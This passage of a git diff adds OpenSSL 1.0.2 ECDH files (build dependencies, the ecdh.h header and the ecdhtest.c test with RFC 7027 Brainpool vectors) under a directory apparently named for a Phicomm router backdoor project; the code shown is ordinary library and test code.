+ech_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ech_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ech_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ech_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ech_err.o: ech_err.c
+ech_kdf.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ech_kdf.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ech_kdf.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ech_kdf.o: ../../include/openssl/evp.h ../../include/openssl/obj_mac.h
+ech_kdf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ech_kdf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ech_kdf.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ech_kdf.o: ../../include/openssl/symhacks.h ech_kdf.c
+ech_key.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ech_key.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ech_key.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ech_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ech_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ech_key.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ech_key.o: ech_key.c ech_locl.h
+ech_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ech_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ech_lib.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ech_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ech_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ech_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ech_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ech_lib.o: ech_lib.c ech_locl.h
+ech_ossl.o: ../../e_os.h ../../include/openssl/asn1.h
+ech_ossl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ech_ossl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+ech_ossl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ech_ossl.o: ../../include/openssl/ecdh.h ../../include/openssl/err.h
+ech_ossl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ech_ossl.o: ../../include/openssl/opensslconf.h
+ech_ossl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ech_ossl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ech_ossl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ech_ossl.o: ../cryptlib.h ech_locl.h ech_ossl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ecdh.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ecdh.h
new file mode 100644
index 0000000..25348b3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ecdh.h
@@ -0,0 +1,134 @@
+/* crypto/ecdh/ecdh.h */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The ECDH software is originally written by Douglas Stebila of
+ * Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef HEADER_ECDH_H
+# define HEADER_ECDH_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_ECDH
+#  error ECDH is disabled.
+# endif
+
+# include <openssl/ec.h>
+# include <openssl/ossl_typ.h>
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/bn.h>
+# endif
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+# define EC_FLAG_COFACTOR_ECDH   0x1000
+
+const ECDH_METHOD *ECDH_OpenSSL(void);
+
+void ECDH_set_default_method(const ECDH_METHOD *);
+const ECDH_METHOD *ECDH_get_default_method(void);
+int ECDH_set_method(EC_KEY *, const ECDH_METHOD *);
+
+int ECDH_compute_key(void *out, size_t outlen, const EC_POINT *pub_key,
+                     EC_KEY *ecdh, void *(*KDF) (const void *in, size_t inlen,
+                                                 void *out, size_t *outlen));
+
+int ECDH_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new
+                          *new_func, CRYPTO_EX_dup *dup_func,
+                          CRYPTO_EX_free *free_func);
+int ECDH_set_ex_data(EC_KEY *d, int idx, void *arg);
+void *ECDH_get_ex_data(EC_KEY *d, int idx);
+
+int ECDH_KDF_X9_62(unsigned char *out, size_t outlen,
+                   const unsigned char *Z, size_t Zlen,
+                   const unsigned char *sinfo, size_t sinfolen,
+                   const EVP_MD *md);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_ECDH_strings(void);
+
+/* Error codes for the ECDH functions. */
+
+/* Function codes. */
+# define ECDH_F_ECDH_CHECK                                102
+# define ECDH_F_ECDH_COMPUTE_KEY                          100
+# define ECDH_F_ECDH_DATA_NEW_METHOD                      101
+
+/* Reason codes. */
+# define ECDH_R_KDF_FAILED                                102
+# define ECDH_R_NON_FIPS_METHOD                           103
+# define ECDH_R_NO_PRIVATE_VALUE                          100
+# define ECDH_R_POINT_ARITHMETIC_FAILURE                  101
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ecdhtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ecdhtest.c
new file mode 100644
index 0000000..2fe2c66
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ecdhtest.c
@@ -0,0 +1,580 @@
+/* crypto/ecdh/ecdhtest.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The ECDH software is originally written by Douglas Stebila of
+ * Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "../e_os.h"
+
+#include <openssl/opensslconf.h> /* for OPENSSL_NO_ECDH */
+#include <openssl/crypto.h>
+#include <openssl/bio.h>
+#include <openssl/bn.h>
+#include <openssl/objects.h>
+#include <openssl/rand.h>
+#include <openssl/sha.h>
+#include <openssl/err.h>
+
+#ifdef OPENSSL_NO_ECDH
+int main(int argc, char *argv[])
+{
+    printf("No ECDH support\n");
+    return (0);
+}
+#else
+# include <openssl/ec.h>
+# include <openssl/ecdh.h>
+
+# ifdef OPENSSL_SYS_WIN16
+#  define MS_CALLBACK     _far _loadds
+# else
+#  define MS_CALLBACK
+# endif
+
+# if 0
+static void MS_CALLBACK cb(int p, int n, void *arg);
+# endif
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+static const int KDF1_SHA1_len = 20;
+static void *KDF1_SHA1(const void *in, size_t inlen, void *out,
+                       size_t *outlen)
+{
+# ifndef OPENSSL_NO_SHA
+    if (*outlen < SHA_DIGEST_LENGTH)
+        return NULL;
+    else
+        *outlen = SHA_DIGEST_LENGTH;
+    return SHA1(in, inlen, out);
+# else
+    return NULL;
+# endif
+}
+
+static int test_ecdh_curve(int nid, const char *text, BN_CTX *ctx, BIO *out)
+{
+    EC_KEY *a = NULL;
+    EC_KEY *b = NULL;
+    BIGNUM *x_a = NULL, *y_a = NULL, *x_b = NULL, *y_b = NULL;
+    char buf[12];
+    unsigned char *abuf = NULL, *bbuf = NULL;
+    int i, alen, blen, aout, bout, ret = 0;
+    const EC_GROUP *group;
+
+    a = EC_KEY_new_by_curve_name(nid);
+    b = EC_KEY_new_by_curve_name(nid);
+    if (a == NULL || b == NULL)
+        goto err;
+
+    group = EC_KEY_get0_group(a);
+
+    if ((x_a = BN_new()) == NULL)
+        goto err;
+    if ((y_a = BN_new()) == NULL)
+        goto err;
+    if ((x_b = BN_new()) == NULL)
+        goto err;
+    if ((y_b = BN_new()) == NULL)
+        goto err;
+
+    BIO_puts(out, "Testing key generation with ");
+    BIO_puts(out, text);
+# ifdef NOISY
+    BIO_puts(out, "\n");
+# else
+    (void)BIO_flush(out);
+# endif
+
+    if (!EC_KEY_generate_key(a))
+        goto err;
+
+    if (EC_METHOD_get_field_type(EC_GROUP_method_of(group)) ==
+        NID_X9_62_prime_field) {
+        if (!EC_POINT_get_affine_coordinates_GFp
+            (group, EC_KEY_get0_public_key(a), x_a, y_a, ctx))
+            goto err;
+    }
+# ifndef OPENSSL_NO_EC2M
+    else {
+        if (!EC_POINT_get_affine_coordinates_GF2m(group,
+                                                  EC_KEY_get0_public_key(a),
+                                                  x_a, y_a, ctx))
+            goto err;
+    }
+# endif
+# ifdef NOISY
+    BIO_puts(out, "  pri 1=");
+    BN_print(out, a->priv_key);
+    BIO_puts(out, "\n  pub 1=");
+    BN_print(out, x_a);
+    BIO_puts(out, ",");
+    BN_print(out, y_a);
+    BIO_puts(out, "\n");
+# else
+    BIO_printf(out, " .");
+    (void)BIO_flush(out);
+# endif
+
+    if (!EC_KEY_generate_key(b))
+        goto err;
+
+    if (EC_METHOD_get_field_type(EC_GROUP_method_of(group)) ==
+        NID_X9_62_prime_field) {
+        if (!EC_POINT_get_affine_coordinates_GFp
+            (group, EC_KEY_get0_public_key(b), x_b, y_b, ctx))
+            goto err;
+    }
+# ifndef OPENSSL_NO_EC2M
+    else {
+        if (!EC_POINT_get_affine_coordinates_GF2m(group,
+                                                  EC_KEY_get0_public_key(b),
+                                                  x_b, y_b, ctx))
+            goto err;
+    }
+# endif
+
+# ifdef NOISY
+    BIO_puts(out, "  pri 2=");
+    BN_print(out, b->priv_key);
+    BIO_puts(out, "\n  pub 2=");
+    BN_print(out, x_b);
+    BIO_puts(out, ",");
+    BN_print(out, y_b);
+    BIO_puts(out, "\n");
+# else
+    BIO_printf(out, ".");
+    (void)BIO_flush(out);
+# endif
+
+    alen = KDF1_SHA1_len;
+    abuf = (unsigned char *)OPENSSL_malloc(alen);
+    aout =
+        ECDH_compute_key(abuf, alen, EC_KEY_get0_public_key(b), a, KDF1_SHA1);
+
+# ifdef NOISY
+    BIO_puts(out, "  key1 =");
+    for (i = 0; i < aout; i++) {
+        sprintf(buf, "%02X", abuf[i]);
+        BIO_puts(out, buf);
+    }
+    BIO_puts(out, "\n");
+# else
+    BIO_printf(out, ".");
+    (void)BIO_flush(out);
+# endif
+
+    blen = KDF1_SHA1_len;
+    bbuf = (unsigned char *)OPENSSL_malloc(blen);
+    bout =
+        ECDH_compute_key(bbuf, blen, EC_KEY_get0_public_key(a), b, KDF1_SHA1);
+
+# ifdef NOISY
+    BIO_puts(out, "  key2 =");
+    for (i = 0; i < bout; i++) {
+        sprintf(buf, "%02X", bbuf[i]);
+        BIO_puts(out, buf);
+    }
+    BIO_puts(out, "\n");
+# else
+    BIO_printf(out, ".");
+    (void)BIO_flush(out);
+# endif
+
+    if ((aout < 4) || (bout != aout) || (memcmp(abuf, bbuf, aout) != 0)) {
+# ifndef NOISY
+        BIO_printf(out, " failed\n\n");
+        BIO_printf(out, "key a:\n");
+        BIO_printf(out, "private key: ");
+        BN_print(out, EC_KEY_get0_private_key(a));
+        BIO_printf(out, "\n");
+        BIO_printf(out, "public key (x,y): ");
+        BN_print(out, x_a);
+        BIO_printf(out, ",");
+        BN_print(out, y_a);
+        BIO_printf(out, "\nkey b:\n");
+        BIO_printf(out, "private key: ");
+        BN_print(out, EC_KEY_get0_private_key(b));
+        BIO_printf(out, "\n");
+        BIO_printf(out, "public key (x,y): ");
+        BN_print(out, x_b);
+        BIO_printf(out, ",");
+        BN_print(out, y_b);
+        BIO_printf(out, "\n");
+        BIO_printf(out, "generated key a: ");
+        for (i = 0; i < bout; i++) {
+            sprintf(buf, "%02X", bbuf[i]);
+            BIO_puts(out, buf);
+        }
+        BIO_printf(out, "\n");
+        BIO_printf(out, "generated key b: ");
+        for (i = 0; i < aout; i++) {
+            sprintf(buf, "%02X", abuf[i]);
+            BIO_puts(out, buf);
+        }
+        BIO_printf(out, "\n");
+# endif
+        fprintf(stderr, "Error in ECDH routines\n");
+        ret = 0;
+    } else {
+# ifndef NOISY
+        BIO_printf(out, " ok\n");
+# endif
+        ret = 1;
+    }
+ err:
+    ERR_print_errors_fp(stderr);
+
+    if (abuf != NULL)
+        OPENSSL_free(abuf);
+    if (bbuf != NULL)
+        OPENSSL_free(bbuf);
+    if (x_a)
+        BN_free(x_a);
+    if (y_a)
+        BN_free(y_a);
+    if (x_b)
+        BN_free(x_b);
+    if (y_b)
+        BN_free(y_b);
+    if (b)
+        EC_KEY_free(b);
+    if (a)
+        EC_KEY_free(a);
+    return (ret);
+}
+
+/* Keys and shared secrets from RFC 7027 */
+
+static const unsigned char bp256_da[] = {
+    0x81, 0xDB, 0x1E, 0xE1, 0x00, 0x15, 0x0F, 0xF2, 0xEA, 0x33, 0x8D, 0x70,
+    0x82, 0x71, 0xBE, 0x38, 0x30, 0x0C, 0xB5, 0x42, 0x41, 0xD7, 0x99, 0x50,
+    0xF7, 0x7B, 0x06, 0x30, 0x39, 0x80, 0x4F, 0x1D
+};
+
+static const unsigned char bp256_db[] = {
+    0x55, 0xE4, 0x0B, 0xC4, 0x1E, 0x37, 0xE3, 0xE2, 0xAD, 0x25, 0xC3, 0xC6,
+    0x65, 0x45, 0x11, 0xFF, 0xA8, 0x47, 0x4A, 0x91, 0xA0, 0x03, 0x20, 0x87,
+    0x59, 0x38, 0x52, 0xD3, 0xE7, 0xD7, 0x6B, 0xD3
+};
+
+static const unsigned char bp256_Z[] = {
+    0x89, 0xAF, 0xC3, 0x9D, 0x41, 0xD3, 0xB3, 0x27, 0x81, 0x4B, 0x80, 0x94,
+    0x0B, 0x04, 0x25, 0x90, 0xF9, 0x65, 0x56, 0xEC, 0x91, 0xE6, 0xAE, 0x79,
+    0x39, 0xBC, 0xE3, 0x1F, 0x3A, 0x18, 0xBF, 0x2B
+};
+
+static const unsigned char bp384_da[] = {
+    0x1E, 0x20, 0xF5, 0xE0, 0x48, 0xA5, 0x88, 0x6F, 0x1F, 0x15, 0x7C, 0x74,
+    0xE9, 0x1B, 0xDE, 0x2B, 0x98, 0xC8, 0xB5, 0x2D, 0x58, 0xE5, 0x00, 0x3D,
+    0x57, 0x05, 0x3F, 0xC4, 0xB0, 0xBD, 0x65, 0xD6, 0xF1, 0x5E, 0xB5, 0xD1,
+    0xEE, 0x16, 0x10, 0xDF, 0x87, 0x07, 0x95, 0x14, 0x36, 0x27, 0xD0, 0x42
+};
+
+static const unsigned char bp384_db[] = {
+    0x03, 0x26, 0x40, 0xBC, 0x60, 0x03, 0xC5, 0x92, 0x60, 0xF7, 0x25, 0x0C,
+    0x3D, 0xB5, 0x8C, 0xE6, 0x47, 0xF9, 0x8E, 0x12, 0x60, 0xAC, 0xCE, 0x4A,
+    0xCD, 0xA3, 0xDD, 0x86, 0x9F, 0x74, 0xE0, 0x1F, 0x8B, 0xA5, 0xE0, 0x32,
+    0x43, 0x09, 0xDB, 0x6A, 0x98, 0x31, 0x49, 0x7A, 0xBA, 0xC9, 0x66, 0x70
+};
+
+static const unsigned char bp384_Z[] = {
+    0x0B, 0xD9, 0xD3, 0xA7, 0xEA, 0x0B, 0x3D, 0x51, 0x9D, 0x09, 0xD8, 0xE4,
+    0x8D, 0x07, 0x85, 0xFB, 0x74, 0x4A, 0x6B, 0x35, 0x5E, 0x63, 0x04, 0xBC,
+    0x51, 0xC2, 0x29, 0xFB, 0xBC, 0xE2, 0x39, 0xBB, 0xAD, 0xF6, 0x40, 0x37,
+    0x15, 0xC3, 0x5D, 0x4F, 0xB2, 0xA5, 0x44, 0x4F, 0x57, 0x5D, 0x4F, 0x42
+};
+
+static const unsigned char bp512_da[] = {
+    0x16, 0x30, 0x2F, 0xF0, 0xDB, 0xBB, 0x5A, 0x8D, 0x73, 0x3D, 0xAB, 0x71,
+    0x41, 0xC1, 0xB4, 0x5A, 0xCB, 0xC8, 0x71, 0x59, 0x39, 0x67, 0x7F, 0x6A,
+    0x56, 0x85, 0x0A, 0x38, 0xBD, 0x87, 0xBD, 0x59, 0xB0, 0x9E, 0x80, 0x27,
+    0x96, 0x09, 0xFF, 0x33, 0x3E, 0xB9, 0xD4, 0xC0, 0x61, 0x23, 0x1F, 0xB2,
+    0x6F, 0x92, 0xEE, 0xB0, 0x49, 0x82, 0xA5, 0xF1, 0xD1, 0x76, 0x4C, 0xAD,
+    0x57, 0x66, 0x54, 0x22
+};
+
+static const unsigned char bp512_db[] = {
+    0x23, 0x0E, 0x18, 0xE1, 0xBC, 0xC8, 0x8A, 0x36, 0x2F, 0xA5, 0x4E, 0x4E,
+    0xA3, 0x90, 0x20, 0x09, 0x29, 0x2F, 0x7F, 0x80, 0x33, 0x62, 0x4F, 0xD4,
+    0x71, 0xB5, 0xD8, 0xAC, 0xE4, 0x9D, 0x12, 0xCF, 0xAB, 0xBC, 0x19, 0x96,
+    0x3D, 0xAB, 0x8E, 0x2F, 0x1E, 0xBA, 0x00, 0xBF, 0xFB, 0x29, 0xE4, 0xD7,
+    0x2D, 0x13, 0xF2, 0x22, 0x45, 0x62, 0xF4, 0x05, 0xCB, 0x80, 0x50, 0x36,
+    0x66, 0xB2, 0x54, 0x29
+};
+
+static const unsigned char bp512_Z[] = {
+    0xA7, 0x92, 0x70, 0x98, 0x65, 0x5F, 0x1F, 0x99, 0x76, 0xFA, 0x50, 0xA9,
+    0xD5, 0x66, 0x86, 0x5D, 0xC5, 0x30, 0x33, 0x18, 0x46, 0x38, 0x1C, 0x87,
+    0x25, 0x6B, 0xAF, 0x32, 0x26, 0x24, 0x4B, 0x76, 0xD3, 0x64, 0x03, 0xC0,
+    0x24, 0xD7, 0xBB, 0xF0, 0xAA, 0x08, 0x03, 0xEA, 0xFF, 0x40, 0x5D, 0x3D,
+    0x24, 0xF1, 0x1A, 0x9B, 0x5C, 0x0B, 0xEF, 0x67, 0x9F, 0xE1, 0x45, 0x4B,
+    0x21, 0xC4, 0xCD, 0x1F
+};
+
+/* Given private value and NID, create EC_KEY structure */
+
+static EC_KEY *mk_eckey(int nid, const unsigned char *p, size_t plen)
+{
+    int ok = 0;
+    EC_KEY *k = NULL;
+    BIGNUM *priv = NULL;
+    EC_POINT *pub = NULL;
+    const EC_GROUP *grp;
+    k = EC_KEY_new_by_curve_name(nid);
+    if (!k)
+        goto err;
+    priv = BN_bin2bn(p, plen, NULL);
+    if (!priv)
+        goto err;
+    if (!EC_KEY_set_private_key(k, priv))
+        goto err;
+    grp = EC_KEY_get0_group(k);
+    pub = EC_POINT_new(grp);
+    if (!pub)
+        goto err;
+    if (!EC_POINT_mul(grp, pub, priv, NULL, NULL, NULL))
+        goto err;
+    if (!EC_KEY_set_public_key(k, pub))
+        goto err;
+    ok = 1;
+ err:
+    if (priv)
+        BN_clear_free(priv);
+    if (pub)
+        EC_POINT_free(pub);
+    if (ok)
+        return k;
+    else if (k)
+        EC_KEY_free(k);
+    return NULL;
+}
+
+/*
+ * Known answer test: compute shared secret and check it matches expected
+ * value.
+ */
+
+static int ecdh_kat(BIO *out, const char *cname, int nid,
+                    const unsigned char *k1, size_t k1_len,
+                    const unsigned char *k2, size_t k2_len,
+                    const unsigned char *Z, size_t Zlen)
+{
+    int rv = 0;
+    EC_KEY *key1 = NULL, *key2 = NULL;
+    unsigned char *Ztmp = NULL;
+    size_t Ztmplen;
+    BIO_puts(out, "Testing ECDH shared secret with ");
+    BIO_puts(out, cname);
+    key1 = mk_eckey(nid, k1, k1_len);
+    key2 = mk_eckey(nid, k2, k2_len);
+    if (!key1 || !key2)
+        goto err;
+    Ztmplen = (EC_GROUP_get_degree(EC_KEY_get0_group(key1)) + 7) / 8;
+    if (Ztmplen != Zlen)
+        goto err;
+    Ztmp = OPENSSL_malloc(Ztmplen);
+    if (!ECDH_compute_key(Ztmp, Ztmplen,
+                          EC_KEY_get0_public_key(key2), key1, 0))
+        goto err;
+    if (memcmp(Ztmp, Z, Zlen))
+        goto err;
+    memset(Ztmp, 0, Zlen);
+    if (!ECDH_compute_key(Ztmp, Ztmplen,
+                          EC_KEY_get0_public_key(key1), key2, 0))
+        goto err;
+    if (memcmp(Ztmp, Z, Zlen))
+        goto err;
+    rv = 1;
+ err:
+    if (key1)
+        EC_KEY_free(key1);
+    if (key2)
+        EC_KEY_free(key2);
+    if (Ztmp)
+        OPENSSL_free(Ztmp);
+    if (rv)
+        BIO_puts(out, " ok\n");
+    else {
+        fprintf(stderr, "Error in ECDH routines\n");
+        ERR_print_errors_fp(stderr);
+    }
+    return rv;
+}
+
+# define test_ecdh_kat(bio, curve, bits) \
+        ecdh_kat(bio, curve, NID_brainpoolP##bits##r1, \
+                bp##bits##_da, sizeof(bp##bits##_da), \
+                bp##bits##_db, sizeof(bp##bits##_db), \
+                bp##bits##_Z, sizeof(bp##bits##_Z))
+
+int main(int argc, char *argv[])
+{
+    BN_CTX *ctx = NULL;
+    int ret = 1;
+    BIO *out;
+
+    CRYPTO_malloc_debug_init();
+    CRYPTO_dbg_set_options(V_CRYPTO_MDEBUG_ALL);
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+# ifdef OPENSSL_SYS_WIN32
+    CRYPTO_malloc_init();
+# endif
+
+    RAND_seed(rnd_seed, sizeof rnd_seed);
+
+    out = BIO_new(BIO_s_file());
+    if (out == NULL)
+        EXIT(1);
+    BIO_set_fp(out, stdout, BIO_NOCLOSE);
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+
+    /* NIST PRIME CURVES TESTS */
+    if (!test_ecdh_curve
+        (NID_X9_62_prime192v1, "NIST Prime-Curve P-192", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_secp224r1, "NIST Prime-Curve P-224", ctx, out))
+        goto err;
+    if (!test_ecdh_curve
+        (NID_X9_62_prime256v1, "NIST Prime-Curve P-256", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_secp384r1, "NIST Prime-Curve P-384", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_secp521r1, "NIST Prime-Curve P-521", ctx, out))
+        goto err;
+# ifndef OPENSSL_NO_EC2M
+    /* NIST BINARY CURVES TESTS */
+    if (!test_ecdh_curve(NID_sect163k1, "NIST Binary-Curve K-163", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect163r2, "NIST Binary-Curve B-163", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect233k1, "NIST Binary-Curve K-233", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect233r1, "NIST Binary-Curve B-233", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect283k1, "NIST Binary-Curve K-283", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect283r1, "NIST Binary-Curve B-283", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect409k1, "NIST Binary-Curve K-409", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect409r1, "NIST Binary-Curve B-409", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect571k1, "NIST Binary-Curve K-571", ctx, out))
+        goto err;
+    if (!test_ecdh_curve(NID_sect571r1, "NIST Binary-Curve B-571", ctx, out))
+        goto err;
+# endif
+    if (!test_ecdh_kat(out, "Brainpool Prime-Curve brainpoolP256r1", 256))
+        goto err;
+    if (!test_ecdh_kat(out, "Brainpool Prime-Curve brainpoolP384r1", 384))
+        goto err;
+    if (!test_ecdh_kat(out, "Brainpool Prime-Curve brainpoolP512r1", 512))
+        goto err;
+
+    ret = 0;
+
+ err:
+    ERR_print_errors_fp(stderr);
+    if (ctx)
+        BN_CTX_free(ctx);
+    BIO_free(out);
+    CRYPTO_cleanup_all_ex_data();
+    ERR_remove_thread_state(NULL);
+    CRYPTO_mem_leaks_fp(stderr);
+    EXIT(ret);
+    return (ret);
+}
+
+# if 0
+static void MS_CALLBACK cb(int p, int n, void *arg)
+{
+    char c = '*';
+
